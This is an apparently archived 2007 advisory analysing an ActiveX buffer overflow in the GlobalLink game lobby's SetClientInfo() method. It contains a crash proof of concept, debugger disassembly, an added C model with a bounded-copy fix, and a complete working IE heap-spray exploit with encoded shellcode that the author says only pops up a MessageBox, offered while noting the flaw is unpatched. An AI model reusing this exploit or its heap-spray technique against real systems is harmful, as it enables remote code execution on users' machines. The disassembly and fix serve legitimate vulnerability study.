GlobalLink glitemflat.dll SetClientInfo() overflow analysis

2007-09-08T00:00:00
ID MYHACK58:62200716840
Type myhack58
Reporter Anonymous
Modified 2007-09-08T00:00:00

Description

Affected version: Lianzhong (GlobalLink) game lobby 2.7.0.8 (released 16 August 2007)

Unaffected version: none yet; Ourgame has not patched it either :-)

Brief analysis. First, the PoC code:

<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT>
<SCRIPT>
s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
target.SetClientInfo(1, s, 1)
</SCRIPT>

Run the PoC and use OllyDbg to catch the exception: an invalid-address access exception on a read of [41414145]. The faulting code is as follows:

033D9315 |> \8B86 DC000000    MOV EAX,DWORD PTR DS:[ESI+DC]
033D931B |.  85C0             TEST EAX,EAX
033D931D |.  74 34            JE SHORT 033D9353
033D931F |.  FF70 04          PUSH DWORD PTR DS:[EAX+4]                ; /hWnd   <=== exception!
033D9322 |.  FF15 F8523F03    CALL DWORD PTR DS:[<&USER32.IsWindow>]   ; \IsWindow

Now look at the registers:

EAX 41414141
ECX 03442070
EDX 006900CD ASCII "ox"
EBX 03442070
ESP 02B9FB2C
EBP 02B9FB48
ESI 03441FD0
EDI 0344210C
EIP 033D931F glitemfl.033D931F

EAX is "AAAA", so the value of EAX is under our control, but at this point we still cannot steer the instruction flow. Look further down:

033D9328 |.  85C0             TEST EAX,EAX
033D932A |.  74 0F            JE SHORT 033D933B                         ; EAX is 0, jump to 0x033D933B
033D932C |.  8B86 DC000000    MOV EAX,DWORD PTR DS:[ESI+DC]
033D9332 |.  FF70 04          PUSH DWORD PTR DS:[EAX+4]                 ; /hWnd
033D9335 |.  FF15 44533F03    CALL DWORD PTR DS:[<&USER32.DestroyWindo>] ; \DestroyWindow
033D933B |>  8B8E DC000000    MOV ECX,DWORD PTR DS:[ESI+DC]             ; ECX is the value we controlled in EAX above
033D9341 |.  85C9             TEST ECX,ECX
033D9343 |.  74 07            JE SHORT 033D934C                         ; not taken when ECX != 0
033D9345 |.  8B01             MOV EAX,DWORD PTR DS:[ECX]
033D9347 |.  6A 01            PUSH 1
033D9349 |.  FF50 0C          CALL DWORD PTR DS:[EAX+C]                 ; virtual function call, controllable
033D934C |>  83A6 DC000000 00 AND DWORD PTR DS:[ESI+DC],0
033D9353 |>  8D86 40010000    LEA EAX,DWORD PTR DS:[ESI+140]

From the code flow above, [ESI+DC] actually holds an object pointer, and that pointer is under our control. The object layout is roughly:

+00h  vmt_ptr
+04h  hWnd
+08h  ...

For exploitation to succeed, the address the hWnd is read from must be readable, the hWnd read out must be an invalid window handle (so that control reaches 0x033D933B), and the dword at offset 0x0C of the table vmt_ptr points to must hold the address of our shellcode.

These conditions look hard to meet, but don't forget we are inside IE: use the heap-spray technique and overwrite the object pointer with 0x0c0c0c0c. The hWnd is then 0x0c0c0c0c, which is basically always an invalid handle (if it happens to be a valid window handle, congratulations, go buy a lottery ticket); vmt_ptr is also this value, vmt_ptr+0x0c is also this value, and the final CALL [EAX+C] gains control.
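As an added illustration (not code from the advisory, and not recovered from glitemflat.dll), the following C model shows the defect class behind the crash: a client-info buffer that is followed in memory by the object pointer the disassembly loads from [ESI+DC], an unbounded copy that reaches into that pointer, and the bounded copy that closes the hole. The struct layout, its 36-byte buffer size and all names are assumptions chosen so that a run of 'A's followed by four trailing bytes lands on the pointer field, the same shape as the demo payload; the 0x41414141 pointer value and the 0x41414145 faulting read are the page's own observations.

```c
/* Added example: a model of the SetClientInfo overflow, not the real glitemflat.dll code.
 * Layout, sizes and names are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OBJ_HWND_OFFSET 0x04   /* "+04h hWnd" in the page's object layout */

/* Hypothetical per-instance state; obj_ptr plays the role of [ESI+DC].
 * A 32-bit pointer width is modelled because the target is a 32-bit IE process. */
struct client_ctx {
    char     info[36];   /* assumed size of the fixed client-info buffer */
    uint32_t obj_ptr;    /* the object pointer the crash shows as 0x41414141 */
};

/* Model of the vulnerable behaviour: the copy is bounded only by the caller's
 * length, so bytes past info[] land in obj_ptr.  The copy goes into a byte image
 * of the struct rather than a live struct so the demo itself stays well-defined C;
 * the return value is what obj_ptr would contain afterwards. */
uint32_t unbounded_copy_obj_ptr(const unsigned char *s, size_t len)
{
    unsigned char image[sizeof(struct client_ctx)];
    uint32_t obj;

    memset(image, 0, sizeof image);
    if (len > sizeof image)
        len = sizeof image;          /* bytes beyond the struct are outside this model */
    memcpy(image, s, len);
    memcpy(&obj, image + offsetof(struct client_ctx, obj_ptr), sizeof obj);
    return obj;
}

/* Hardened version: reject input that does not fit, then copy with a bound.
 * obj_ptr can never be touched, whatever length the script passes. */
int set_client_info_checked(struct client_ctx *ctx, const unsigned char *s, size_t len)
{
    if (ctx == NULL || s == NULL)
        return -1;
    if (len >= sizeof ctx->info)     /* leave room for the terminator */
        return -1;
    memcpy(ctx->info, s, len);
    ctx->info[len] = '\0';
    return 0;
}

/* Number of input bytes the unbounded copy consumes before it reaches obj_ptr. */
size_t bytes_before_obj_ptr(void)
{
    return offsetof(struct client_ctx, obj_ptr);
}

/* The first dereference in the disassembly is PUSH DWORD PTR [EAX+4] (the hWnd
 * field), so the faulting read address is obj_ptr + 4: 0x41414141 + 4 = 0x41414145. */
uint32_t first_faulting_read(uint32_t obj_ptr)
{
    return obj_ptr + OBJ_HWND_OFFSET;
}

int main(void)
{
    unsigned char payload[40];
    struct client_ctx ctx;

    /* Constructed input shaped like the demo payload: 'A's up to the pointer field,
     * then four bytes that become the new obj_ptr (little-endian). */
    memset(payload, 'A', sizeof payload);
    memcpy(payload + bytes_before_obj_ptr(), "\x0c\x0c\x0c\x0c", 4);

    printf("obj_ptr after unbounded copy: 0x%08x\n",
           (unsigned)unbounded_copy_obj_ptr(payload, sizeof payload));
    printf("first faulting read for obj_ptr 0x41414141: 0x%08x\n",
           (unsigned)first_faulting_read(0x41414141u));

    memset(&ctx, 0, sizeof ctx);
    ctx.obj_ptr = 0x03442070u;       /* constructed stand-in for a valid pointer */
    printf("checked copy of %zu bytes: %d (obj_ptr still 0x%08x)\n", sizeof payload,
           set_client_info_checked(&ctx, payload, sizeof payload), (unsigned)ctx.obj_ptr);
    return 0;
}
```

The model reproduces the page's two observations: a payload of nothing but 'A's leaves 0x41414141 in the pointer slot, and the first use of that pointer is a read at 0x41414145. The checked variant turns the same oversized input into an error return, which is the root fix; the kill-bit and heap-spray mitigations that browsers apply on top of it address the delivery path rather than the defect.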

Demo code (the shellcode just pops up a MessageBox; tested on IE6 SP2 and IE7):

<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT>
<SCRIPT>
document.write("<meta http-equiv=\"refresh\" content=\"1," + window.location.href + "\"></meta>");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape( // just pop up a MessageBox
"%u0eeb%u4b5b%uc933%ubfb1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe67%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%uc716%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufeda%ufefe%u96ac%u91d0%u998c%u9096%uce8a%u9693%u8edd%uca96%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u019c%u0101%u8acc%uf26f%u7187%u9e32%uf494%ue0c6%u3344%u4d2e%u3a4b%u968d%u929b%u9d92%u9a91%ufe9b"
);

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
    memory[i] = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
    while (spraySlide.length*2<spraySlideSize)
    {
        spraySlide += spraySlide;
    }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return spraySlide;
}

s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\x0c\x0c\x0c\x0c"
target.SetClientInfo(1, s, 1)
</SCRIPT>